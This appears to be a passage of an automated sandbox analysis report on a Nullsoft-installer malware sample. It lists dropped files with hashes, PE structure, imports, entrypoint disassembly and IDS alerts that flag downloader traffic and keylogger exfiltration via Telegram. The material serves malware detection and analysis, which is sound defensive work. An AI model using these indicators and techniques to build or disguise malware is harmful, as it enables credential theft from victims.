	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe	Get hash	malicious	Remcos	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Iw\14-scaled.jpg

Download File

Process:	C:\Users\user\Desktop\b5BQbAhwVD.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 2560x2560, components 3
Category:	dropped
Size (bytes):	484658
Entropy (8bit):	7.809711763657168
Encrypted:	false
SSDEEP:	12288:W1S3xo63wl4biprI2S4WwWEcwxg9dvVAxZOCLF0DB:Wo3xX3y4bz2lWwWo6rSTZyd
MD5:	5C727AE28F0DECF497FBB092BAE01B4E
SHA1:	AADE364AE8C2C91C6F59F85711B53078FB0763B7
SHA-256:	77CCACF58330509839E17A6CFD6B17FE3DE31577D8E2C37DC413839BA2FEEC80
SHA-512:	5246C0FBA41DF66AF89D986A3CEABC99B61DB9E9C217B28B2EC18AF31E3ED17C865387223CEB3A38A804243CF3307E07E557549026F49F52829BEBC4D4546C40
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.....,.,.....]http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.566ebc5, 2022/05/09-07:22:29 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmp:CreateDate="2018-04-27T15:00:27+08:00" xmp:ModifyDate="2022-09-22T14:01:54+08:00" xmp:MetadataDate="2022-09-22T14:01:54+08:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:b728d5c8-8822-6d4c-afc1-a393cb2a04ec"

C:\Users\user\AppData\Local\Iw\Brassware.ove

Download File

Process:	C:\Users\user\Desktop\b5BQbAhwVD.exe
File Type:	data
Category:	dropped
Size (bytes):	138650
Entropy (8bit):	4.602674644849829
Encrypted:	false
SSDEEP:	1536:8CApqNR0FvvIUnCd76hp6viXqSSi9/Apc+ehgIyEIvLb0zrWalq6c1P3ZKGpQ:8BpoRxUK6f6JSSSYpc+eeIyRvEI6GprQ
MD5:	CCA2743B86AE89D56AD2E254CA8A76A7
SHA1:	1AFED5654E8BA2EF041B5F96414C23E8FF980734
SHA-256:	0ED1033765AFFF1C36508DC20CFF1275331E43D976088C4F61AFACF4B9D5B20F
SHA-512:	DE337776ECEF97887253E0F8162071AA2BB7637697E105A89FE3945173B57997D87EBE89E246B3BE8B1DB4A77E36F142D3178D219C60AD3EAC061AC206EDCD12
Malicious:	false
Reputation:	low
Preview:	..........EE.zzzz..rr....v........cc........................uu....-..........mmm.......:...####...............>>>.........JJ.........................X...............................................ee.W.............{{...g.W....................................2...]............e...........MM.... ....../.....M....6.......................................N..n............zz......II..........................o.*......`.......................WWW........w..Y.......................a.11.4..zz....BB.=..................................LL.....4...[...ZZZZ..)....................j...............U................ddd.G.........................\\......AA.......................<.........111....[.................S........WWWW.......]].....................yy.....'.HH................6........~...........zz.......pppp....................x.......CCC.***.::::..<..yyy...................AAAA...........................i.........1.....XX............p....................?.....i.....>>..H......wwwww.....6.......m..!

C:\Users\user\AppData\Local\Iw\Holomyarii.Reg

Download File

Process:	C:\Users\user\Desktop\b5BQbAhwVD.exe
File Type:	data
Category:	dropped
Size (bytes):	287758
Entropy (8bit):	7.7555939328893375
Encrypted:	false
SSDEEP:	6144:Le4P2YlxxNXjisHuCoaNnzlAGq0Xbsm4KZFSieck:Cyxni4ZoaNnzln1C2q7
MD5:	4D03315C42C65B6FD5FE3F331943B973
SHA1:	DA48A3D5A3AC5653209C23076837F6B45882C334
SHA-256:	8F179C1D3BF015C6213EC4B61A3EA198041E090A4681AA794A76365259C24968
SHA-512:	72A0F77C334C02F7C4EC3AD67D5A6B62DE3032B22B9175292513B33DB4F7B555E8B40916C29FD2C0B65BF05A354791DAF1A3B3D03E9F9A957568C62352BC72B0
Malicious:	false
Reputation:	low
Preview:	....\|\|............S....r....B..............bb...............................@."..................................11.............N.......*.............-..........x.K.~...G.............ZZ......xx..........2.........pp.............?...........y.i...&&&&.......EEE...111..!!.....:::::::.....??....HH................x.ppp.D.%%.....................T...........bb.///.......{.mmm...HH..+....m...........#.....$......^^^..............aaaa........................1..............D......... ...............................r.K........................\\\\................11............``.........++....................//..........RR.............RR.9............G.$............E............o............{{{..#..y.LL........,.........~~~......L.......f.......................9.t...........:::...................i.....`....................%...................................^.J....../..SS...LLL........................................L............7...........G.KKKKKKK...............j...............................

C:\Users\user\AppData\Local\Iw\Kbmandsskole.str

Download File

Process:	C:\Users\user\Desktop\b5BQbAhwVD.exe
File Type:	data
Category:	dropped
Size (bytes):	112291
Entropy (8bit):	1.249420131631438
Encrypted:	false
SSDEEP:	768:5R+BCpkJWjYWL2MxTVLvUjpGqik9JiAfWA2DBQwD1PzUH+HYZmIo7x31sT:WCZY21w0I2NZYD
MD5:	4D1D72CFC5940B09DFBD7B65916F532E
SHA1:	30A45798B534842002B103A36A3B907063F8A96C
SHA-256:	479F1904096978F1011DF05D52021FAEEE028D4CF331024C965CED8AF1C8D496
SHA-512:	048844A09E291903450188715BCDDF14F0F1F10BEAFBD005882EBF5D5E31A71D8F93EEBE788BD54B4AED2266C454F4DCA18AF4567977B7E773BBE29A38DEA45B
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	..........P............+......................................................................................................................X......n..(................G...................................m.........\|.......................U.............`............l..............@}.........a........................................s............y.................N...............B...............w.e..........................................Q......*...................................................................................................a...........................f..................p..................t...........................................9.Q................@....................e................................................................:..............P.......S.........................P........................9..............._.......................(...............N............................................................H.T..........c..............................

C:\Users\user\AppData\Local\Iw\Sensuousnesses.opk

Download File

Process:	C:\Users\user\Desktop\b5BQbAhwVD.exe
File Type:	data
Category:	dropped
Size (bytes):	362089
Entropy (8bit):	1.23992084267325
Encrypted:	false
SSDEEP:	768:xOeaameETrlE0+1mGOWb3h5WAV0hW+JSLSwzj2HlSdL0f6mhKZRaqOzWz6szt3cA:x+ds5dYOVxIW3hhdeRt6MeZ1W4vB
MD5:	A4340182CDDD2EC1F1480360218343F9
SHA1:	50EF929FEA713AA6FCC05E8B75F497B7946B285B
SHA-256:	B91E5B1FF5756F0B93DCF11CBC8B467CDA0C5792DE24D27EC86E7C74388B44B3
SHA-512:	021F198AFF7CCED92912C74FC97D1919A9E059F22E99AB1236FBAA36C16B520C07B78F47FC01FCFAC1B53A87CDAE3E440D0589FA2844612617FAB2EDB64A3573
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	..........F.............................i.....................B.........................................b..Et.............................O...........h...............................................................................8..........n.....................w.................../.......\|.......'........,..........(...........................W......#..................................................................................................=..........................]..........q................................................[.................2....S............................"...................................$!..............................=.......................................[f.................................................................................................................V.............................w...................................................$.............................................................j...........h.............J..............

C:\Users\user\AppData\Local\Iw\prepares.pli

Download File

Process:	C:\Users\user\Desktop\b5BQbAhwVD.exe
File Type:	FoxPro FPT, blocks size 22, next free block index 285212672, field type 0
Category:	dropped
Size (bytes):	139354
Entropy (8bit):	1.2473328695625903
Encrypted:	false
SSDEEP:	768:9OsMSh8lSnJGyUzWZsO2ipzPFmDZC9kpzroto48tf2+5lVp:9delFlqNawgJp
MD5:	B0FB6B583D6902DE58E1202D12BA4832
SHA1:	7F585B5C3A4581CE76E373C78A6513F157B20480
SHA-256:	E6EA5F6D0C7F5FA407269C7F4FF6D97149B7611071BF5BF6C454B810501AE661
SHA-512:	E0894FFBD76C3476DC083DAFD24F88964BF6E09E4CA955766B43FE73A764A00247C930E9996652A22B57B27826CD94F88B8178514060CA398DE568675F9E4571
Malicious:	false
Preview:	.......................................\|...................................................................+................$......&....A........................................................Z.....................................A...............!.....Y........................l..........9..................c.............f.................F...".................................................h.......................................\..............J............................5......t.....E.................q........................:......^....................................................................................I..........................................................x......W....................................................................................M...........................X..............................,..................m.......................................................................................................................J........ ...F...........

C:\Users\user\AppData\Local\Temp\nss447F.tmp

Download File

Process:	C:\Users\user\Desktop\b5BQbAhwVD.exe
File Type:	data
Category:	dropped
Size (bytes):	1550943
Entropy (8bit):	5.45998716754557
Encrypted:	false
SSDEEP:	24576:vHypJZhzpo2Zo3xX3y4bz2lWwWo6rSTZyO:PypJZ/poBXbz2luo6rS1yO
MD5:	ECBE36029FAC4F13BBC57210B7B90A2D
SHA1:	1AF9CECB1F869FB477488FAE8133791EE5A8B2EA
SHA-256:	C537A2B264C0180628325C3CC4E6ADCDAEF9DCBE8BC3A19E19CC2EAEEC6A65D2
SHA-512:	64EAB064591405C204D4D6899604A10CD9C718AA281F8807CA9286D828BE0908FCFAB4FAD8CECBB2C28F0495D98F3A2AAB99924CBDCC823342345BB766DB6DA2
Malicious:	false
Preview:	.5......,.......,.......\........!.......4.......5..........................M...i............................H..............................................................................................................................................................................G...J...........t...h...............................................................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nss456A.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\b5BQbAhwVD.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.719859767584478
Encrypted:	false
SSDEEP:	192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
MD5:	0D7AD4F45DC6F5AA87F606D0331C6901
SHA1:	48DF0911F0484CBE2A8CDD5362140B63C41EE457
SHA-256:	3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
SHA-512:	C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 9Yn5tjyOgT.exe, Detection: malicious, Browse Filename: 6ZoBPR3isG.exe, Detection: malicious, Browse Filename: V7OHj6ISEo.exe, Detection: malicious, Browse Filename: 2CQ2zMn0hb.exe, Detection: malicious, Browse Filename: 6mGpn6kupm.exe, Detection: malicious, Browse Filename: v4nrZtP7K2.exe, Detection: malicious, Browse Filename: xXUnP7uCBJ.exe, Detection: malicious, Browse Filename: 4UQ5wnI389.exe, Detection: malicious, Browse Filename: ajRZflJ2ch.exe, Detection: malicious, Browse Filename: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.....................@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.961501480254122
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	b5BQbAhwVD.exe
File size:	1'050'481 bytes
MD5:	8e4a2b26b311d9e5c9a920186b0b8025
SHA1:	f433a5c5020d31b0278b659e01cbb3882c671487
SHA256:	d314fe716123c0fac98d48d7d4acd4fe887217c2a9ad0fc96850235785f7f79b
SHA512:	06d922de26bf2808e740ae9c0d282c13dac4f4aa42e22458089f08b3297661ef2aefe16c0099bd1393fe5d443a10b1f425acf1fb2597ff63d31bbb37e76c613a
SSDEEP:	24576:9jwKCNPYCP4T85MgzoEHzizaMr+GGU8HgpIw8hadmA:V1CSgSYoEOzJiGd+gpH8hadt
TLSH:	EF25334931E2E9A2D7E38AF99629CCD777DBAD031420F15313B4352A9C3971F8A1B258
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...$..\.................f...*.....

File Icon


Icon Hash:	46224e4c19391d03

Static PE Info

General

Entrypoint:	0x4034a5
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5C157F24 [Sat Dec 15 22:24:36 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	1f23f452093b5c1ff091a2f9fb4fa3e9

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A230h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080ACh]
call dword ptr [004080A8h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042A24Ch], eax
je 00007F8D6CD0F8F3h
push ebx
call 00007F8D6CD12BBDh
cmp eax, ebx
je 00007F8D6CD0F8E9h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007F8D6CD12B37h
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F8D6CD0F8CCh
push 0000000Ah
call 00007F8D6CD12B90h
push 00000008h
call 00007F8D6CD12B89h
push 00000006h
mov dword ptr [0042A244h], eax
call 00007F8D6CD12B7Dh
cmp eax, ebx
je 00007F8D6CD0F8F1h
push 0000001Eh
call eax
test eax, eax
je 00007F8D6CD0F8E9h
or byte ptr [0042A24Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [0042A318h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 004216E8h
call dword ptr [00408188h]
push 0040A384h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x55000	0x21068	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6409	0x6600	bfe2b726d49cbd922b87bad5eea65e61	False	0.6540287990196079	data	6.416186322230332	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1396	0x1400	d45dcba8ca646543f7e339e20089687e	False	0.45234375	data	5.154907432640367	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20358	0x600	8575fc5e872ca789611c386779287649	False	0.5026041666666666	data	4.004402321344153	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x2a000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x55000	0x21068	0x21200	03ed2ed76ba15352dac9e48819696134	False	0.8714696344339623	data	7.556190648348207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x554c0	0x368	Device independent bitmap graphic, 96 x 16 x 4, image size 768	English	United States	0.23623853211009174
RT_ICON	0x55828	0xc2a3	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9966684729162903
RT_ICON	0x61ad0	0x86e0	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.990210843373494
RT_ICON	0x6a1b0	0x5085	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9867559307233299
RT_ICON	0x6f238	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.4358921161825726
RT_ICON	0x717e0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.4896810506566604
RT_ICON	0x72888	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.5367803837953091
RT_ICON	0x73730	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.6913357400722022
RT_ICON	0x73fd8	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.38597560975609757
RT_ICON	0x74640	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.4934971098265896
RT_ICON	0x74ba8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.651595744680851
RT_ICON	0x75010	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.46908602150537637
RT_ICON	0x752f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.5472972972972973
RT_DIALOG	0x75420	0x120	data	English	United States	0.53125
RT_DIALOG	0x75540	0x118	data	English	United States	0.5678571428571428
RT_DIALOG	0x75658	0x120	data	English	United States	0.5104166666666666
RT_DIALOG	0x75778	0xf8	data	English	United States	0.6330645161290323
RT_DIALOG	0x75870	0xa0	data	English	United States	0.6125
RT_DIALOG	0x75910	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x75970	0xae	data	English	United States	0.6091954022988506
RT_VERSION	0x75a20	0x308	data	English	United States	0.47036082474226804
RT_MANIFEST	0x75d28	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	ExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T22:43:24.036995+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	49869	142.250.186.142	443	TCP
2025-01-10T22:43:30.402572+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49910	132.226.8.169	80	TCP
2025-01-10T22:43:37.277592+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49910	132.226.8.169	80	TCP
2025-01-10T22:43:37.911520+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	49964	149.154.167.220	443	TCP
2025-01-10T22:43:38.290741+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	49964	149.154.167.220	443	TCP
2025-01-10T22:43:39.340074+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49973	132.226.8.169	80	TCP
2025-01-10T22:43:39.938527+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	49978	149.154.167.220	443	TCP
2025-01-10T22:43:40.403998+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	49978	149.154.167.220	443	TCP
2025-01-10T22:43:41.885949+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	49989	149.154.167.220	443	TCP
2025-01-10T22:43:42.193783+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	49989	149.154.167.220	443	TCP
2025-01-10T22:43:43.707201+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	49992	149.154.167.220	443	TCP
2025-01-10T22:43:44.155656+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	49992	149.154.167.220	443	TCP
2025-01-10T22:43:45.360498+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	49995	149.154.167.220	443	TCP
2025-01-10T22:43:45.707079+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	49995	149.154.167.220	443	TCP
2025-01-10T22:43:46.930726+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	49997	149.154.167.220	443	TCP
2025-01-10T22:43:47.355654+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	49997	149.154.167.220	443	TCP
2025-01-10T22:43:48.575526+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	49999	149.154.167.220	443	TCP
2025-01-10T22:43:48.810566+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	49999	149.154.167.220	443	TCP
2025-01-10T22:43:50.047051+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50001	149.154.167.220	443	TCP
2025-01-10T22:43:50.501847+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50001	149.154.167.220	443	TCP
2025-01-10T22:43:52.277358+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50003	149.154.167.220	443	TCP
2025-01-10T22:43:52.514440+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50003	149.154.167.220	443	TCP
2025-01-10T22:43:53.729116+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50005	149.154.167.220	443	TCP
2025-01-10T22:43:53.963506+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50005	149.154.167.220	443	TCP
2025-01-10T22:43:55.173244+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50007	149.154.167.220	443	TCP
2025-01-10T22:43:55.399919+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50007	149.154.167.220	443	TCP
2025-01-10T22:43:56.652227+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50009	149.154.167.220	443	TCP
2025-01-10T22:43:56.922750+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50009	149.154.167.220	443	TCP
2025-01-10T22:43:58.160008+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50011	149.154.167.220	443	TCP
2025-01-10T22:43:58.556032+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50011	149.154.167.220	443	TCP
2025-01-10T22:43:59.932227+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50013	149.154.167.220	443	TCP
2025-01-10T22:44:00.306097+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50013	149.154.167.220	443	TCP
2025-01-10T22:44:01.623949+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50015	149.154.167.220	443	TCP
2025-01-10T22:44:01.880986+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50015	149.154.167.220	443	TCP
2025-01-10T22:44:03.134782+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50017	149.154.167.220	443	TCP
2025-01-10T22:44:03.565415+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50017	149.154.167.220	443	TCP
2025-01-10T22:44:04.758561+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50019	149.154.167.220	443	TCP
2025-01-10T22:44:05.137762+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50019	149.154.167.220	443	TCP
2025-01-10T22:44:06.367104+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50021	149.154.167.220	443	TCP
2025-01-10T22:44:06.769294+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50021	149.154.167.220	443	TCP
2025-01-10T22:44:08.066307+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	50025	149.154.167.220	443	TCP
2025-01-10T22:44:08.473446+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.6	50025	149.154.167.220	443	TCP
